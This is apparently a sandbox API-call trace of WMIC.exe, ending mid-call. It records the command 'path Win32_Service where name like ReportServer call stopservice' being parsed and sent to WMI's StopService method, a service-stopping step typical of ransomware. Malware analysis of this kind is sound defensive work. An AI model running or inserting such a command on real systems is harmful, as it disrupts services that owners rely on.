IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.210] free (_Block=0xec920) [0245.210] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0245.210] malloc (_Size=0x18) returned 0xec920 [0245.210] malloc (_Size=0x18) returned 0xec940 [0245.210] SysStringLen (param_1="htable-sortby") returned 0xd [0245.210] SysStringLen (param_1="TABLE") returned 0x5 [0245.210] SysStringLen (param_1="htable-sortby") returned 0xd [0245.210] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.210] SysStringLen (param_1="htable-sortby") returned 0xd [0245.210] SysStringLen (param_1="XML") returned 0x3 [0245.210] SysStringLen (param_1="htable-sortby") returned 0xd [0245.210] SysStringLen (param_1="texttablewsys") returned 0xd [0245.210] SysStringLen (param_1="htable-sortby") returned 0xd [0245.210] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0245.211] SysStringLen (param_1="XML") returned 0x3 [0245.211] SysStringLen (param_1="htable-sortby") returned 0xd [0245.211] malloc (_Size=0x30) returned 0xe8480 [0245.211] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.211] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.211] IUnknown:Release (This=0x220a280) returned 0x0 [0245.211] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=17, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.211] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="mof.xsl") returned 0x0 [0245.211] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.211] malloc (_Size=0x18) returned 0xec960 [0245.211] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.211] free (_Block=0xec960) [0245.211] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0245.211] malloc (_Size=0x18) returned 0xec960 [0245.211] malloc (_Size=0x18) returned 0xec980 [0245.212] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0245.212] SysStringLen (param_1="TABLE") returned 0x5 [0245.212] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0245.212] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.212] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0245.212] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.212] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0245.212] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0245.212] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.212] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0245.212] malloc (_Size=0x30) returned 0xe84c0 [0245.212] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.212] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.212] IUnknown:Release (This=0x220a280) returned 0x0 [0245.212] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=18, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.212] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="mof.xsl") returned 0x0 [0245.212] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.212] malloc (_Size=0x18) returned 0xec9a0 [0245.212] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.213] free (_Block=0xec9a0) [0245.213] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0245.213] malloc (_Size=0x18) returned 0xec9a0 [0245.213] malloc (_Size=0x18) returned 0xec9c0 [0245.213] SysStringLen (param_1="wmiclimofformat") returned 0xf [0245.213] SysStringLen (param_1="TABLE") returned 0x5 [0245.213] SysStringLen (param_1="wmiclimofformat") returned 0xf [0245.213] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.213] SysStringLen (param_1="wmiclimofformat") returned 0xf [0245.213] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.213] SysStringLen (param_1="wmiclimofformat") returned 0xf [0245.213] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0245.213] SysStringLen (param_1="wmiclimofformat") returned 0xf [0245.213] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0245.213] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.213] SysStringLen (param_1="wmiclimofformat") returned 0xf [0245.213] malloc (_Size=0x30) returned 0xe8500 [0245.213] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.213] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.213] IUnknown:Release (This=0x220a280) returned 0x0 [0245.213] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=19, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.213] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="textvaluelist.xsl") returned 0x0 [0245.213] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.214] malloc (_Size=0x18) returned 0xec9e0 [0245.214] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.214] free (_Block=0xec9e0) [0245.214] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0245.214] malloc (_Size=0x18) returned 0xec9e0 [0245.214] malloc (_Size=0x18) returned 0xeca00 [0245.214] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0245.214] SysStringLen (param_1="TABLE") returned 0x5 [0245.214] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0245.214] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.214] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0245.214] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.214] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0245.214] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.214] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.214] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0245.214] malloc (_Size=0x30) returned 0xe8540 [0245.214] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.214] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.214] IUnknown:Release (This=0x220a280) returned 0x0 [0245.214] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=20, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.215] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="textvaluelist.xsl") returned 0x0 [0245.215] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.215] malloc (_Size=0x18) returned 0xeca20 [0245.215] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.215] free (_Block=0xeca20) [0245.215] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0245.215] malloc (_Size=0x18) returned 0xeca20 [0245.215] malloc (_Size=0x18) returned 0xeca40 [0245.215] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0245.215] SysStringLen (param_1="TABLE") returned 0x5 [0245.215] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0245.215] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.215] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0245.215] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.215] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0245.215] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.215] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0245.215] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0245.215] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.216] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0245.216] malloc (_Size=0x30) returned 0xe8580 [0245.216] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.216] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.216] IUnknown:Release (This=0x220a280) returned 0x0 [0245.216] IUnknown:Release (This=0x2209cc0) returned 0x0 [0245.216] FreeThreadedDOMDocument:IUnknown:Release (This=0x220bc50) returned 0x1 [0245.216] FreeThreadedDOMDocument:IUnknown:Release (This=0x22071d0) returned 0x0 [0245.216] free (_Block=0xe6f70) [0245.216] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" [0245.216] malloc (_Size=0xe0) returned 0xecd30 [0245.216] memcpy_s (in: _Destination=0xecd30, _DestinationSize=0xde, _Source=0x2f25ee, _SourceSize=0xda | out: _Destination=0xecd30) returned 0x0 [0245.216] malloc (_Size=0x18) returned 0xeca60 [0245.216] malloc (_Size=0x18) returned 0xeca80 [0245.217] malloc (_Size=0x18) returned 0xecaa0 [0245.217] malloc (_Size=0x18) returned 0xecac0 [0245.217] malloc (_Size=0x80) returned 0xe6f70 [0245.217] GetLocalTime (in: lpSystemTime=0x1af6b0 | out: lpSystemTime=0x1af6b0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x4, wMilliseconds=0x1e)) [0245.217] _vsnwprintf (in: _Buffer=0xe6f70, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1af608 | out: _Buffer="04-28-2020T20:42:04") returned 19 [0245.217] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.217] malloc (_Size=0x96) returned 0xece20 [0245.217] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.217] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.217] malloc (_Size=0x96) returned 0xecec0 [0245.217] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.217] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.217] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.217] malloc (_Size=0xa) returned 0xecae0 [0245.217] lstrlenW (lpString="path") returned 4 [0245.217] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0245.217] malloc (_Size=0xa) returned 0xecb00 [0245.217] malloc (_Size=0x8) returned 0xe7000 [0245.217] free (_Block=0x0) [0245.217] free (_Block=0xecae0) [0245.217] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.217] malloc (_Size=0x1c) returned 0xecf60 [0245.217] lstrlenW (lpString="Win32_Service") returned 13 [0245.217] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0245.217] malloc (_Size=0x1c) returned 0xecf90 [0245.217] malloc (_Size=0x10) returned 0xecae0 [0245.218] memmove_s (in: _Destination=0xecae0, _DestinationSize=0x8, _Source=0xe7000, _SourceSize=0x8 | out: _Destination=0xecae0) returned 0x0 [0245.218] free (_Block=0xe7000) [0245.218] free (_Block=0x0) [0245.218] free (_Block=0xecf60) [0245.218] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.218] malloc (_Size=0xc) returned 0xecb20 [0245.218] lstrlenW (lpString="where") returned 5 [0245.218] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0245.218] malloc (_Size=0xc) returned 0xecb40 [0245.218] malloc (_Size=0x18) returned 0xecb60 [0245.218] memmove_s (in: _Destination=0xecb60, _DestinationSize=0x10, _Source=0xecae0, _SourceSize=0x10 | out: _Destination=0xecb60) returned 0x0 [0245.218] free (_Block=0xecae0) [0245.218] free (_Block=0x0) [0245.218] free (_Block=0xecb20) [0245.218] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.218] malloc (_Size=0x3e) returned 0xecfc0 [0245.218] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0245.218] _wcsicmp (_String1="\"name like '%%ReportServer%%'\"", _String2="\"NULL\"") returned -20 [0245.218] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0245.218] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0245.218] malloc (_Size=0x3e) returned 0xed010 [0245.218] malloc (_Size=0x20) returned 0xecf60 [0245.218] memmove_s (in: _Destination=0xecf60, _DestinationSize=0x18, _Source=0xecb60, _SourceSize=0x18 | out: _Destination=0xecf60) returned 0x0 [0245.218] free (_Block=0xecb60) [0245.218] free (_Block=0x0) [0245.218] free (_Block=0xecfc0) [0245.218] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.218] malloc (_Size=0xa) returned 0xecb60 [0245.218] lstrlenW (lpString="call") returned 4 [0245.218] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0245.218] malloc (_Size=0xa) returned 0xecb20 [0245.218] malloc (_Size=0x30) returned 0xe85c0 [0245.219] memmove_s (in: _Destination=0xe85c0, _DestinationSize=0x20, _Source=0xecf60, _SourceSize=0x20 | out: _Destination=0xe85c0) returned 0x0 [0245.219] free (_Block=0xecf60) [0245.219] free (_Block=0x0) [0245.219] free (_Block=0xecb60) [0245.219] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 74 [0245.219] malloc (_Size=0x18) returned 0xecb60 [0245.219] lstrlenW (lpString="stopservice") returned 11 [0245.219] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0245.219] malloc (_Size=0x18) returned 0xecae0 [0245.219] free (_Block=0x0) [0245.219] free (_Block=0xecb60) [0245.219] malloc (_Size=0x30) returned 0xe8600 [0245.219] lstrlenW (lpString="QUIT") returned 4 [0245.219] lstrlenW (lpString="path") returned 4 [0245.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0245.219] lstrlenW (lpString="EXIT") returned 4 [0245.219] lstrlenW (lpString="path") returned 4 [0245.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0245.219] free (_Block=0xe8600) [0245.219] WbemLocator:IUnknown:AddRef (This=0x1dc1390) returned 0x2 [0245.219] malloc (_Size=0x30) returned 0xe8600 [0245.219] lstrlenW (lpString="/") returned 1 [0245.219] lstrlenW (lpString="path") returned 4 [0245.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0245.219] lstrlenW (lpString="-") returned 1 [0245.219] lstrlenW (lpString="path") returned 4 [0245.219] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0245.219] lstrlenW (lpString="CLASS") returned 5 [0245.219] lstrlenW (lpString="path") returned 4 [0245.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0245.220] lstrlenW (lpString="PATH") returned 4 [0245.220] lstrlenW (lpString="path") returned 4 [0245.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0245.220] lstrlenW (lpString="/") returned 1 [0245.220] lstrlenW (lpString="Win32_Service") returned 13 [0245.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0245.220] lstrlenW (lpString="-") returned 1 [0245.220] lstrlenW (lpString="Win32_Service") returned 13 [0245.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0245.220] lstrlenW (lpString="Win32_Service") returned 13 [0245.220] malloc (_Size=0x1c) returned 0xecf60 [0245.220] lstrlenW (lpString="Win32_Service") returned 13 [0245.220] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0245.220] lstrlenW (lpString="Win32_Service") returned 13 [0245.220] malloc (_Size=0x1c) returned 0xecfc0 [0245.220] lstrlenW (lpString="Win32_Service") returned 13 [0245.220] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xc0550 | out: _String=0x0, _Context=0xc0550) returned 0x0 [0245.220] lstrlenW (lpString="") returned 0 [0245.220] lstrlenW (lpString="WHERE") returned 5 [0245.220] lstrlenW (lpString="where") returned 5 [0245.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0245.220] lstrlenW (lpString="/") returned 1 [0245.220] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0245.220] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="/", cchCount2=1) returned 3 [0245.220] lstrlenW (lpString="-") returned 1 [0245.220] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="-", cchCount2=1) returned 3 [0245.221] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0245.221] malloc (_Size=0x3a) returned 0xed060 [0245.221] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0245.221] lstrlenW (lpString="/") returned 1 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0245.221] lstrlenW (lpString="-") returned 1 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] malloc (_Size=0xa) returned 0xecb60 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] lstrlenW (lpString="GET") returned 3 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0245.221] lstrlenW (lpString="LIST") returned 4 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0245.221] lstrlenW (lpString="SET") returned 3 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0245.221] lstrlenW (lpString="CREATE") returned 6 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0245.221] lstrlenW (lpString="CALL") returned 4 [0245.221] lstrlenW (lpString="call") returned 4 [0245.221] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0245.222] lstrlenW (lpString="/") returned 1 [0245.222] lstrlenW (lpString="stopservice") returned 11 [0245.222] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0245.222] lstrlenW (lpString="-") returned 1 [0245.222] lstrlenW (lpString="stopservice") returned 11 [0245.222] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0245.222] lstrlenW (lpString="stopservice") returned 11 [0245.222] malloc (_Size=0x18) returned 0xecb80 [0245.222] lstrlenW (lpString="stopservice") returned 11 [0245.222] ??0CHString@@QEAA@XZ () returned 0x1ad258 [0245.222] GetCurrentThreadId () returned 0x730 [0245.222] GetCurrentThreadId () returned 0x730 [0245.222] ??0CHString@@QEAA@XZ () returned 0x1ad028 [0245.222] malloc (_Size=0x8) returned 0xecff0 [0245.222] malloc (_Size=0x18) returned 0xecba0 [0245.222] malloc (_Size=0x18) returned 0xecbc0 [0245.222] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1dc1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4a2950 | out: ppNamespace=0xff4a2950*=0x1dd3a98) returned 0x0 [0245.242] free (_Block=0xecbc0) [0245.242] CoSetProxyBlanket (pProxy=0x1dd3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0245.242] free (_Block=0xecff0) [0245.242] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.242] free (_Block=0xecba0) [0245.242] malloc (_Size=0x18) returned 0xecba0 [0245.242] IWbemServices:GetObject (in: This=0x1dd3a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1ad238*=0x0, ppCallResult=0x0 | out: ppObject=0x1ad238*=0x1dfbfa0, ppCallResult=0x0) returned 0x0 [0245.262] free (_Block=0xecba0) [0245.262] IWbemClassObject:BeginMethodEnumeration (This=0x1dfbfa0, lEnumFlags=0) returned 0x0 [0245.262] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="StartService", ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x1dfc4a0) returned 0x0 [0245.262] lstrlenW (lpString="StartService") returned 12 [0245.262] lstrlenW (lpString="stopservice") returned 11 [0245.262] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0245.263] IUnknown:Release (This=0x1dfc4a0) returned 0x0 [0245.263] IWbemClassObject:NextMethod (in: This=0x1dfbfa0, lFlags=0, pstrName=0x1ad218*=0x0, ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x0 | out: pstrName=0x1ad218*="StopService", ppInSignature=0x1ad220*=0x0, ppOutSignature=0x1ad228*=0x1dfc4a0) returned 0x0 [0245.263] lstrlenW (lpString="StopService") returned 11 [0245.263] lstrlenW (lpString="stopservice") returned 11 [0245.263] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0245.263] malloc (_Size=0x70) returned 0xed0b0 [0245.263] ??0CHString@@QEAA@XZ () returned 0x1acbe8 [0245.263] GetCurrentThreadId () returned 0x730 [0245.263] IWbemClassObject:GetNames (in: This=0x1dfc4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x1acbe0 | out: pNames=0x1acbe0*="\x01ƀ\x08") returned 0x0 [0245.263] SafeArrayGetLBound (in: psa=0x394ae0, nDim=0x1, plLbound=0x1acbf8 | out: plLbound=0x1acbf8) returned 0x0 [0245.263] SafeArrayGetUBound (in: psa=0x394ae0, nDim=0x1, plUbound=0x1acbf4 | out: plUbound=0x1acbf4) returned 0x0 [0245.263] SafeArrayGetElement (in: psa=0x394ae0, rgIndices=0x1acbd4, pv=0x1acbd8 | out: pv=0x1acbd8) returned 0x0 [0245.263] malloc (_Size=0x48) returned 0xed130 [0245.263] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1dfc4a0, wszProperty="ReturnValue", ppQualSet=0x1aca28 | out: ppQualSet=0x1aca28*=0x1dc13b0) returned 0x0 [0245.264] malloc (_Size=0x18) returned 0xecba0 [0245.264] IWbemQualifierSet:Get (in: This=0x1dc13b0, wszName="CIMTYPE", lFlags=0, pVal=0x1acab0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x1acab0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0245.264] free (_Block=0xecba0) [0245.264] malloc (_Size=0x18) returned 0xecba0 [0245.264] IWbemClassObject:Get (in: This=0x1dfc4a0, wszName="ReturnValue", lFlags=0, pVal=0x1acb58*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1aca38*=1755776, plFlavor=0x0 | out: pVal=0x1acb58*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1aca38*=19, plFlavor=0x0) returned 0x0 [0245.264] malloc (_Size=0x18) returned 0xecbc0 [0245.264] IWbemQualifierSet:Get (in: This=0x1dc13b0, wszName="read", lFlags=0, pVal=0x1aca40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4a2ac0), plFlavor=0x0 | out: pVal=0x1aca40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4a2ac0), plFlavor=0x0) returned 0x80041002 [0245.264] free (_Block=0xecbc0) [0245.264] malloc (_Size=0x18) returned 0xecbc0 [0245.264] IWbemQualifierSet:Get (in: This=0x1dc13b0, wszName="write", lFlags=0, pVal=0x1aca40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4a2ac0), plFlavor=0x0 | out: pVal=0x1aca40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4a2ac0), plFlavor=0x0) returned 0x80041002 [0245.264] free (_Block=0xecbc0) [0245.264] malloc (_Size=0x18) returned 0xecbc0 [0245.265] malloc (_Size=0x18) returned 0xecbe0 [0245.265] IWbemQualifierSet:Get (in: This=0x1dc13b0, wszName="Description", lFlags=0, pVal=0x1acaf0*(varType=0x0, wReserved1=0x1a, wReserved2=0x0, wReserved3=0x0, varVal1=0xff444293, varVal2=0x1acaf8), plFlavor=0x0 | out: pVal=0x1acaf0*(varType=0x0, wReserved1=0x1a, wReserved2=0x0, wReserved3=0x0, varVal1=0xff444293, varVal2=0x1acaf8), plFlavor=0x0) returned 0x80041002 [0245.265] free (_Block=0xecbe0) [0245.265] malloc (_Size=0x18) returned 0xecbe0 [0245.265] lstrlenA (lpString="Not Available") returned 13 [0245.265] malloc (_Size=0x1c) returned 0xed180 [0245.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4322f0, cbMultiByte=-1, lpWideCharStr=0xed180, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0245.265] free (_Block=0xed180) [0245.265] IUnknown:Release (This=0x1dc13b0) returned 0x0 [0245.265] malloc (_Size=0x48) returned 0xed180 [0245.265] malloc (_Size=0x18) returned 0xecc00 [0245.265] malloc (_Size=0x48) returned 0xed1d0 [0245.265] malloc (_Size=0x70) returned 0xed220 [0245.265] malloc (_Size=0x48) returned 0xed2a0 [0245.265] free (_Block=0xed1d0) [0245.265] free (_Block=0xed180) [0245.265] free (_Block=0xed130) [0245.265] free (_Block=0xecbc0) [0245.265] free (_Block=0xecbe0) [0245.265] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.265] IWbemClassObject:GetMethodQualifierSet (in: This=0x1dfbfa0, wszMethod="StopService", ppQualSet=0x1ad158 | out: 